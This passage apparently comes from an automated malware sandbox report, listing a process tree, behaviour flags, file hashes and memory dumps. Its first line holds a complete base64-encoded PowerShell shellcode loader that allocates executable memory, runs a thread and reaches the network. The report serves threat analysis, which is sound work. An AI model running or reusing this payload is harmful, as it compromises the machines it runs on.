      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JABBAEsAdwBwACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAQQBLAHcAcAAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiAGYALAAwAHgAYwBiACwAMAB4ADYANQAsADAAeAA4ADQALAAwAHgAZAA0ACwAMAB4AGQAZAAsADAAeABjADcALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAOAAsADAAeAAzADEALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAOAAzACwAMAB4AGMAMAAsADAAeAAwADQALAAwAHgAMwAxACwAMAB4ADcAOAAsADAAeAAwAGUALAAwAHgAMAAzACwAMAB4AGIAMwAsADAAeAA2AGIALAAwAHgANgA2ACwAMAB4ADIAMQAsADAAeABiAGYALAAwAHgAOQBjACwAMAB4AGUAOQAsADAAeABjAGEALAAwAHgAMwBmACwAMAB4ADUAZAAsADAAeAA5ADYALAAwAHgAZgBiACwAMAB4AGUAZAAsADAAeAAzADkALAAwAHgAZABkACwAMAB4AGEAZQAsADAAeAAyADEALAAwAHgANAA5ACwAMAB4AGIAMwAsADAAeAA0ADIALAAwAHgAYwA4ACwAMAB4AGEAOAAsADAAeABiAGYALAAwAHgAMAA5ACwAMAB4AGQAZQAsADAAeABiADkALAAwAHgAYgAyACwAMAB4ADgANQAsADAAeABkADEALAAwAHgAMABhACwAMAB4ADcAOAAsADAAeABmADAALAAwAHgAZABjACwAMAB4ADgAYgAsADAAeAA0AGMALAAwAHgAMwBjACwAMAB4AGIAMgAsADAAeAA0ADgALAAwAHgAYwBlACwAMAB4AGMAMAAsADAAeABjADgALAAwAHgAOQBjACwAMAB4ADMAMAAsADAAeABmADgALAAwAHgAMAAzACwAMAB4AGQAMQAsADAAeAAzADEALAAwAHgAMwBkACwAMAB4AGQAMgAsADAAeAA5AGYALAAwAHgAZABlACwAMAB4ADkAMwAsADAAeABiADMALAAwAHgAZAA0ACwAMAB4ADcAMwAsADAAeAAwADQALAAwAHgAYgAwACwAMAB4AGEAOQAsADAAeAA0AGYALAAwAHgAMgA1ACwAMAB4ADEANgAsADAAeABhADYALAAwAHgAZgAwACwAMAB4ADUAZAAsADAAeAAxADMALAAwAHgANwA5ACwAMAB4ADgANAAsADAAeABkADEALAAwAHgAMQBhACwAMAB4AGEAYQAsADAAeAAzADUALAAwAHgANgAxACwAMAB4ADUANAAsADAAeAA1ADIALAAwAHgAMwBkACwAMAB4ADIAZAAsADAAeAA0ADQALAAwAHgANgAzACwAMAB4ADkAMgAsADAAeAA0AGIALAAwAHgANABkACwAMAB4ADEANwAsADAAeAAyADgALAAwAHgANgA1ACwAMAB4AGIAMgAsADAAeAA5ADEALAAwAHgAZABiACwAMAB4AGIAMQAsADAAeABjADcALAAwAHgAMgAzACwAMAB4ADAAYQAsADAAeAA4ADgALAAwAHgAMQA3ACwAMAB4AGUAMgAsADAAeAA3AGQALAAwAHgAZQA2ACwAMAB4ADMAYgAsADAAeABlADQALAAwAHgANAA2ACwAMAB4AGMAMQAsADAAeABhADMALAAwAHgAOQAyACwAMAB4AGIAYwAsADAAeAAzADEALAAwAHgANQBlACwAMAB4AGEANQAsADAAeAAwADYALAAwAHgANABiACwAMAB4ADgANAAsADAAeAAyADAALAAwAHgAOQA5ACwAMAB4AGUAYgAsADAAeAA0AGYALAAwAHgAOQAyACwAMAB4ADcAZAAsADAAeAAwAGQALAAwAHgAOQBjACwAMAB4ADQANQAsADAAeABmADUALAAwAHgAMAAxACwAMAB4ADYAOQAsADAAeAAwADEALAAwAHgANQAxACwAMAB4ADAANgAsADAAeAA2AGMALAAwAHgAYwA2ACwAMAB4AGUAOQAsADAAeAAzADIALAAwAHgAZQA1ACwAMAB4AGUAOQAsADAAeAAzAGQALAAwAHgAYgAzACwAMAB4AGIAZAAsADAAeABjAGQALAAwAHgAOQA5ACwAMAB4ADkAZgAsADAAeAA2ADYALAAwAHgANgBmACwAMAB4AGIAYgAsADAAeAA0ADUALAAwAHgAYwA5ACwAMAB4ADkAMAAsADAAeABkAGIALAAwAHgAMgAyACwAMAB4AGIANgAsADAAeAAzADQALAAwAHgAOQA3ACwAMAB4AGMAMQAsADAAeABhADEALAAwAHgANAA5ACwAMAB4ADUAOAAsADAAeAAxAGEALAAwAHgAYwBlACwAMAB4ADEANwAsADAAeABjAGYALAAwAHgAZAA2ACwAMAB4ADAAMgAsADAAeABhADgALAAwAHgAMABmACwAMAB4ADcAMQAsADAAeAAxADUALAAwAHgAZABiACwAMAB4ADMAZAAsADAAeABkAGUALAAwAHgAOABkACwAMAB4ADcAMwAsADAAeAAwAGUALAAwAHgAOQA3ACwAMAB4ADAAYgAsADAAeAA4ADMALAAwAHgAMAA3ACwAMAB4AGIAZgAsADAAeABhAGMALAAwAHgANQBiACwAMAB4AGEAZgAsADAAeABkADAALAAwAHgANQAzACwAMAB4ADUAYwAsADAAeABkADAALAAwAHgAZgA5ACwAMAB4ADkANwAsADAAeAAwADgALAAwAHgAOAAwACwAMAB4ADkAMQAsADAAeAAzAGUALAAwAHgAMwAxACwAMAB4ADQAYgAsADAAeAA2ADIALAAwAHgAYgBmACwAMAB4AGUANAAsADAAeABlADYALAAwAHgANgA4ACwAMAB4ADUANwAsADAAeABhAGEALAAwAHgAMgAzACwAMAB4AGIANwAsADAAeAA4AGEALAAwAHgAZABjACwAMAB4AGMAOQAsADAAeAA0ADgALAAwAHgAYwAzACwAMAB4ADYAYQAsADAAeAA0ADcALAAwAHgAYQBlACwAMAB4AGIAYgAsADAAeABjADIALAAwAHgAMAA3ACwAMAB4ADcAZgAsADAAeAA3AGIALAAwAHgAYgAzACwAMAB4AGUANwAsADAAeAAyAGYALAAwAHgAMQAzACwAMAB4AGQAOQAsADAAeABlADcALAAwAHgAMQAwACwAMAB4ADAAMwAsADAAeABlADIALAAwAHgAMgBkACwAMAB4ADMAOQAsADAAeABhADkALAAwAHgAMABkACwAMAB4ADkAOAAsADAAeAAxADEALAAwAHgANAA1ACwAMAB4AGIANwAsADAAeAA4ADEALAAwAHgAZQBhACwAMAB4AGYANAAsADAAeAAzADgALAAwAHgAMQBjACwAMAB4ADkANwAsADAAeAAzADYALAAwAHgAYgAyACwAMAB4ADkAMwAsADAAeAA2ADcALAAwAHgAZgA4ACwAMAB4ADMAMwAsADAAeABkADkALAAwAHgANwBiACwAMAB4ADYAYwAsADAAeABiADQALAAwAHgAOQA0ACwAMAB4ADIANgAsADAAeAAzAGEALAAwAHgAYwBiACwAMAB4ADAAMgAsADAAeAA0AGMALAAwAHgAYwAyACwAMAB4ADUAOQAsADAAeABhADkALAAwAHgAYwA3ACwAMAB4ADkANQAsADAAeABmADUALAAwAHgAYgAzACwAMAB4ADMAZQAsADAAeABkADEALAAwAHgANQA5ACwAMAB4ADQAYgAsADAAeAAxADUALAAwAHgANgBhACwAMAB4ADUAMwAsADAAeABkADkALAAwAHgAZAA2ACwAMAB4ADAANAAsADAAeAA5AGMALAAwAHgAMABkACwAMAB4AGQANwAsADAAeABkADQALAAwAHgAYwBhACwAMAB4ADQANwAsADAAeABkADcALAAwAHgAYgBjACwAMAB4AGEAYQAsADAAeAAzADMALAAwAHgAOAA0ACwAMAB4AGQAOQAsADAAeABiADQALAAwAHgAZQA5ACwAMAB4AGIAOAAsADAAeAA3ADIALAAwAHgAMgAxACwAMAB4ADEAMgAsADAAeABlADkALAAwAHgAMgA3ACwAMAB4AGUAMgAsADAAeAA3AGEALAAwAHgAMQA3ACwAMAB4ADEAZQAsADAAeABjADQALAAwAHgAMgA0ACwAMAB4AGUAOAAsADAAeAA3ADUALAAwAHgAZAA0ACwAMAB4ADEAOQAsADAAeAAzAGYALAAwAHgAYgAzACwAMAB4AGEAMgAsADAAeAA3ADMALAAwAHgAOAAzADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABRADkAdABIAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABRADkAdABIAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABRADkAdABIACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1220
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yjgsqapf.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2884
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES99D0.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC99CF.tmp"
        6⤵
        
        PID:2780

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES99D0.tmp

Filesize
1KB

MD5
ff358386e0efcfc4cc31daf48dc48e50

SHA1
42444cf1cebbd72553cf02e13542e241d03e6576

SHA256
509bd90b7fba07ee8c19ab4344eb8189506a116da4dea7b62165ec0d45e845db

SHA512
e4b953f2f5ff4cf334e4fbaf1ccbdb71f2c98a52b0c7e5bd098504be31bf5eb47d6b23e566d0309396c47b07d2031cc241adeecfc5d214794a2125c9b9509902

Download Submit
C:\Users\Admin\AppData\Local\Temp\yjgsqapf.dll

Filesize
3KB

MD5
c01e923d2909cac78b0805f424f5e182

SHA1
309643fda394e545c598d4996cec59650da218b6

SHA256
f4ded3c4d641647b292ed336f7bce3d4c567fd4e49bec52fbb73a52a54eaec92

SHA512
ade57149d14b7b838dc2059c12b7866c997ccce6adc5c712456b226bd3d19f5e42557ff939190049168860b3429a3356e464d859f1ec9e31554109609b21bbcf

Download Submit
C:\Users\Admin\AppData\Local\Temp\yjgsqapf.pdb

Filesize
7KB

MD5
4311d87e3a596e7e410bd3343c8a788c

SHA1
cd19a914f7f61495f03bed86218e89deb8113c7b

SHA256
34dd58a2b66b6245271d27a318d1853f0f129e0379b97cec93a39a397271b7f1

SHA512
26eb6cd1413448de9fd30315afc83ede4e08a1eb94ddccb3f6e4e3778c077f3615de2df3675ad98097796514fb3be3415a49e49739ea266d018116b8b3883b75

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
04879825abf4855b9c398c86e50b426d

SHA1
ee40fa68077e5d69a29832a6fe4f0efba8eb209b

SHA256
836797fd553d3f723baadf737e7ee2cb9b7440e749a3c6eac052067921ae410d

SHA512
ef246801424836ff6d767cf7e825493cf723896aa2e468e0d51d343a078b78556a1af5a29387098fae26139fbfe57cc0ce366f51914a4fe9fe69f0f02d646f85

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KQMPAEAY7R82EI7IOH2U.temp

Filesize
7KB

MD5
04879825abf4855b9c398c86e50b426d

SHA1
ee40fa68077e5d69a29832a6fe4f0efba8eb209b

SHA256
836797fd553d3f723baadf737e7ee2cb9b7440e749a3c6eac052067921ae410d

SHA512
ef246801424836ff6d767cf7e825493cf723896aa2e468e0d51d343a078b78556a1af5a29387098fae26139fbfe57cc0ce366f51914a4fe9fe69f0f02d646f85

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC99CF.tmp

Filesize
652B

MD5
31ef40f7080c0282eb6db99fb6e4147e

SHA1
5862ab773e5d3f670522a949e56d549d2ac9f6b9

SHA256
1a4b131bd5a8ab09539fa9bee9c18c1fcde79ae9c00420657ca5118cde4d504b

SHA512
0038ebc9e8032d71d7dc411064706afc90d07d7306292820c26825e8c14f7acae5143244b469e059b5f7af13f5d787a9f818bf955e8114fa3dcf5df5aaeb1cae

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yjgsqapf.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yjgsqapf.cmdline

Filesize
309B

MD5
0846f94b1d2df5696d1d244bbbb6b08b

SHA1
3c5eaa2ebea6327fe478a109e22e42dedc007015

SHA256
d934c085c5a010073c0d7e39801a22a05fdd02b8061a627ee96a228e09c706e4

SHA512
c86f017885939ad66440e632d15f31d8eefa5bc258d6090f70f9e3035dc06fdb49d1af5ef0649dbeecd380ef48a88a368e3e8740ff6c0dca92595850700663cf

Download Submit
memory/1220-82-0x00000000028A0000-0x00000000028E0000-memory.dmp

Filesize
256KB

Download
memory/1220-112-0x00000000028A0000-0x00000000028E0000-memory.dmp

Filesize
256KB

Download
memory/1220-113-0x00000000028A0000-0x00000000028E0000-memory.dmp

Filesize
256KB

Download
memory/1220-115-0x0000000073B90000-0x000000007413B000-memory.dmp

Filesize
5.7MB

Download
memory/1220-108-0x00000000026D0000-0x00000000026D1000-memory.dmp

Filesize
4KB

Download
memory/1220-111-0x0000000073B90000-0x000000007413B000-memory.dmp

Filesize
5.7MB

Download
memory/1220-109-0x00000000026D0000-0x00000000026D1000-memory.dmp

Filesize
4KB

Download
memory/1220-86-0x00000000028A0000-0x00000000028E0000-memory.dmp

Filesize
256KB

Download
memory/1220-80-0x0000000073B90000-0x000000007413B000-memory.dmp

Filesize
5.7MB

Download
memory/1220-79-0x0000000073B90000-0x000000007413B000-memory.dmp

Filesize
5.7MB

Download
memory/2332-54-0x000000013FD40000-0x000000013FD63000-memory.dmp

Filesize
140KB

Download
memory/2552-84-0x0000000002520000-0x00000000025A0000-memory.dmp

Filesize
512KB

Download
memory/2552-60-0x0000000002310000-0x0000000002318000-memory.dmp

Filesize
32KB

Download
memory/2552-83-0x0000000002520000-0x00000000025A0000-memory.dmp

Filesize
512KB

Download
memory/2552-81-0x000007FEF60C0000-0x000007FEF6A5D000-memory.dmp

Filesize
9.6MB

Download
memory/2552-117-0x000007FEF60C0000-0x000007FEF6A5D000-memory.dmp

Filesize
9.6MB

Download
memory/2552-59-0x000000001B360000-0x000000001B642000-memory.dmp

Filesize
2.9MB

Download
memory/2552-91-0x0000000002520000-0x00000000025A0000-memory.dmp

Filesize
512KB

Download
memory/2552-66-0x0000000002520000-0x00000000025A0000-memory.dmp

Filesize
512KB

Download
memory/2552-61-0x000007FEF60C0000-0x000007FEF6A5D000-memory.dmp

Filesize
9.6MB

Download
memory/2552-62-0x0000000002520000-0x00000000025A0000-memory.dmp

Filesize
512KB

Download
memory/2552-63-0x0000000002520000-0x00000000025A0000-memory.dmp

Filesize
512KB

Download
memory/2552-64-0x0000000002520000-0x00000000025A0000-memory.dmp

Filesize
512KB

Download
memory/2552-65-0x000007FEF60C0000-0x000007FEF6A5D000-memory.dmp

Filesize
9.6MB

Download
memory/2552-85-0x0000000002520000-0x00000000025A0000-memory.dmp

Filesize
512KB

Download
memory/2672-74-0x00000000027B0000-0x0000000002830000-memory.dmp

Filesize
512KB

Download
memory/2672-72-0x000007FEF60C0000-0x000007FEF6A5D000-memory.dmp

Filesize
9.6MB

Download
memory/2672-97-0x00000000027B0000-0x0000000002830000-memory.dmp

Filesize
512KB

Download
memory/2672-95-0x00000000027B0000-0x0000000002830000-memory.dmp

Filesize
512KB

Download
memory/2672-110-0x00000000027B0000-0x0000000002830000-memory.dmp

Filesize
512KB

Download
memory/2672-94-0x00000000027B0000-0x0000000002830000-memory.dmp

Filesize
512KB

Download
memory/2672-93-0x000007FEF60C0000-0x000007FEF6A5D000-memory.dmp

Filesize
9.6MB

Download
memory/2672-73-0x00000000027B0000-0x0000000002830000-memory.dmp

Filesize
512KB

Download
memory/2672-75-0x000007FEF60C0000-0x000007FEF6A5D000-memory.dmp

Filesize
9.6MB

Download
memory/2672-116-0x000007FEF60C0000-0x000007FEF6A5D000-memory.dmp

Filesize
9.6MB

Download
memory/2672-76-0x00000000027B0000-0x0000000002830000-memory.dmp

Filesize
512KB

Download
memory/2884-96-0x0000000002090000-0x00000000020D0000-memory.dmp

Filesize
256KB

Download